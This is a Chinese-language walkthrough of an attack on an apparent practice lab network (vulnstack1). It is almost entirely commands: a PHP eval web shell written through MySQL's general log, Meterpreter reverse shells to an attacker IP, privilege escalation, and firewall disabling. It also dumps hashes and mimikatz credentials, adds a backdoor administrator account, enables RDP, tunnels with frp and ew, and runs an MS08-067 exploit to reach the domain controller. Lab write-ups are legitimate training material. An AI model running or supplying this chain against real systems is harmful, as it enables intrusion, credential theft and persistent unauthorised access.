一、获取shell
data:image/s3,"s3://crabby-images/d7e48/d7e4852c06e2d808173b5cadbb4a28053c4318e5" alt=""
show variables like '%general%'; #查看日志状态
data:image/s3,"s3://crabby-images/e0857/e0857cd1d32104794de74144f51e7ab6d27a798f" alt=""
当开启general时,所执行的sql语句都会出现在stu1.log文件中。那么,如果修改generallogfile的值,那么所执行的sql语句就会对应生成对应的文件中,进而getshell。SET GLOBAL general_log='on'
data:image/s3,"s3://crabby-images/dd63f/dd63f2cb9a3e43dee02456c0fa24195c0874ce42" alt=""
SHOW VARIABLES LIKE '%secure%'
data:image/s3,"s3://crabby-images/e5282/e52826777aa622b6dd9a7c8c50f0458cd09defe9" alt=""
SET GLOBAL general_log_file='C:/phpStudy/www/test1.php' 改变日志生成的地址
data:image/s3,"s3://crabby-images/13e1d/13e1dc81ed3d2b49a7aa47b1ed4eb4a1c8e57e7f" alt=""
写入一句话
SELECT'<?php eval($_POST["cmd"]);?>'
data:image/s3,"s3://crabby-images/26993/26993b01dac939a40a5c11ffdb4aa922989f30c5" alt=""
cs上线
data:image/s3,"s3://crabby-images/a59fc/a59fceaeac8df6f1cb33b55f001630476268491a" alt=""
data:image/s3,"s3://crabby-images/17b6b/17b6b1c3de96e6637c36952841ec7e5185173a56" alt=""
shell ipconfig
data:image/s3,"s3://crabby-images/5b571/5b5718e944d311f28e970433cb1488a5038b5320" alt=""
data:image/s3,"s3://crabby-images/3e1f9/3e1f9a373ce1dc23c382eef2c95ef05369e284a4" alt=""
shell systeminfo
data:image/s3,"s3://crabby-images/3adde/3adde0e0af62bab58e2c98fef62df41b8f83c6b3" alt=""
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.44.129
lhost => 192.168.44.129
msf exploit(handler) > set lport 2222
lport =>2222msf exploit(handler) > exploit
data:image/s3,"s3://crabby-images/160bb/160bb8f33b056442eeeb767766b4e10d9bd7432d" alt=""
data:image/s3,"s3://crabby-images/dc51c/dc51cbcb6bf1e1745289272c72dbc25325e88ec6" alt=""
getsystem提权成功
data:image/s3,"s3://crabby-images/83e9d/83e9d9bd424884044fdad4df6bc134b75795401f" alt=""
迁移进程
data:image/s3,"s3://crabby-images/6ef98/6ef98cea6acd331e3e4188e3e473f884777fe1bf" alt=""
data:image/s3,"s3://crabby-images/d74d9/d74d995ad235dc110d0bf684aeb03dd3cb4e5e4d" alt=""
关闭防火墙
netsh firewall set opmode disable
data:image/s3,"s3://crabby-images/0f6cc/0f6cc1aa43cc1f9ec2ee405d04199a5ff68e1b8a" alt=""
获取密码
run hashdump
data:image/s3,"s3://crabby-images/8415b/8415ba0ff555c7bb082ecc7da7a8e707d5ad151d" alt=""
load mimikatz
data:image/s3,"s3://crabby-images/e819a/e819a16c6c7e56b7167498eb26341ee80c2c0607" alt=""
wdigest
data:image/s3,"s3://crabby-images/da697/da6970d8066e3fb445774326c15eff94b73850eb" alt=""
直接cs
data:image/s3,"s3://crabby-images/aee4b/aee4b12b6e6f158ec580549ddf44fc7139c8f88d" alt=""
data:image/s3,"s3://crabby-images/888ea/888ea6cd3c8eaa84277978e3c699d9f539f07866" alt=""
netsh advfirewall set allprofiles state off
关墙
进行远程登录
开启3389
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
data:image/s3,"s3://crabby-images/8b114/8b114282852abb68771892c6f99115df8ee81fc7" alt=""
添加管理员账号
net user username password /add
net localgroup administrators username /add
net user bienao 123.com /add
net localgroup administrators bienao /add
data:image/s3,"s3://crabby-images/5e997/5e997036453bad61de3a0631cafb6e680f0d060e" alt=""
65001 UTF-8代码页 解决乱码
chcp 65001
data:image/s3,"s3://crabby-images/760a1/760a1210fb0fb769569362ed5b0524919d64ad0e" alt=""
远程连接
rdesktop 192.168.44.128:3389
data:image/s3,"s3://crabby-images/6cd67/6cd67d0c8c584ed2188bbc3b49f2a4d8312c0494" alt=""
data:image/s3,"s3://crabby-images/a3d21/a3d21ab0c8d12ce9223be5cbb56d2be698325dd5" alt=""
探测域内存活主机
run windows/gather/enum_ad_computers
添加路由
run autoroute -s 192.168.52.0/24
run autoroute -p
data:image/s3,"s3://crabby-images/76034/76034833818747532752c0902fdb1a40952f096a" alt=""
信息收集
data:image/s3,"s3://crabby-images/9d6d9/9d6d9db75d8a127232855ca958b990a1ecd4e069" alt=""
data:image/s3,"s3://crabby-images/5bb39/5bb3999da4b832ca307401b2e9998be5393d67df" alt=""
判断域控
shell net view /domain
shell net time /domain
data:image/s3,"s3://crabby-images/7e3cb/7e3cb8ed5a68b4807ef1ce553102229f2aad6770" alt=""
执行探测
for /L %i IN (1,1,254) DO ping -w 2 -n 1 192.168.52.%i
data:image/s3,"s3://crabby-images/01248/01248ea18932cf6ecb23256b2218ba35f884771e" alt=""
arp -a 主机探测
data:image/s3,"s3://crabby-images/38486/38486df39171b17b061462ba70bc2e313bf59f2f" alt=""
nmap --script=vuln 192.168.52.141
data:image/s3,"s3://crabby-images/b9e86/b9e86496732e4e1dd83019b9f03271fa048b39c4" alt=""
nmap --script=vuln 192.168.52.138
修改frps.ini文件
vim frps.ini
data:image/s3,"s3://crabby-images/11b12/11b12177a4a696de019e33ccbedd66344fa28ff0" alt=""
启动frp
./frps -c frps.ini
data:image/s3,"s3://crabby-images/e6e63/e6e63370c74df9f4f995c2916d22cf8924e21567" alt=""
data:image/s3,"s3://crabby-images/8169d/8169d0bb127c23f347a9d0e77c4ca40f51071b91" alt=""
frpc.exe -c frpc.ini
data:image/s3,"s3://crabby-images/58f1c/58f1cd3e0259e532b1d752cf3eb54aba7799238c" alt=""
或者(ip不一样)
Kali: ./ew_for_linux64 -s rcsocks -l 1080 -e 1024
这条命令的意思是说让公网服务器监听1080和1024端口,等待攻击者机器访问1080端口,目标机器访问1024端口
windows: .ew_for_Win.exe -s rssocks -d 192.168.255.132 -e 1024
data:image/s3,"s3://crabby-images/59fef/59fef78faed089857223ec5355fa11aeac784aba" alt=""
data:image/s3,"s3://crabby-images/fb462/fb462a68f45ccbd7b9b34a976b24fe7ca979dd3e" alt=""
proxychains代理
vi /etc/proxychains.conf
data:image/s3,"s3://crabby-images/f2ed5/f2ed507dbdceddd786ba45b62485e0216f6bc005" alt=""
msf5 exploit(multi/handler) > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.52.141
rhosts => 192.168.52.141
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > run
data:image/s3,"s3://crabby-images/e1e6d/e1e6d9c55fd8a2c3e16751862f7713e340ca4104" alt=""
net user bienao 123.com /add
net localgroup administrators bienao /add
netsh advfirewall set allprofiles state off 关墙
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 开3389
data:image/s3,"s3://crabby-images/68b87/68b87c2193a83c190c91b6f375b143050d796470" alt=""
远程连接
rdesktop 192.168.44.141:3389
远程失败
getuid
run hashdump
data:image/s3,"s3://crabby-images/806d2/806d2cc8f18616fb9bc557f5aac1ac3537e534f2" alt=""
wdigest #获取系统账户信息
load mimikatz #加载mimikatz
kerberos #获取明文
data:image/s3,"s3://crabby-images/646de/646dea06555c5891dfeb1aa3e2f2b3e741c7fe2f" alt=""
域控弹回CS
meterpreter > background
[*] Backgrounding session 2...
msf5 exploit(windows/smb/ms08_067_netapi) > use exploit/multi/handler
msf5 exploit(multi/handler) > use exploit/windows/local/payload_inject
msf5 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf5 exploit(windows/local/payload_inject) > set lhost 192.168.44.129
lhost => 192.168.44.129
msf5 exploit(windows/local/payload_inject) > set lport 1111
lport => 1111
msf5 exploit(windows/local/payload_inject) > set session 2
session => 2
msf5 exploit(windows/local/payload_inject) > set disablepayloadhandler true
disablepayloadhandler => true
msf5 exploit(windows/local/payload_inject) > run
data:image/s3,"s3://crabby-images/3a846/3a8463426a769343e32188349930d4801332db71" alt=""
参考学习
https://blog.csdn.net/qq_42349134/article/details/103135062
https://www.cooyf.com/bj/vulnstack1.html#0x04%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F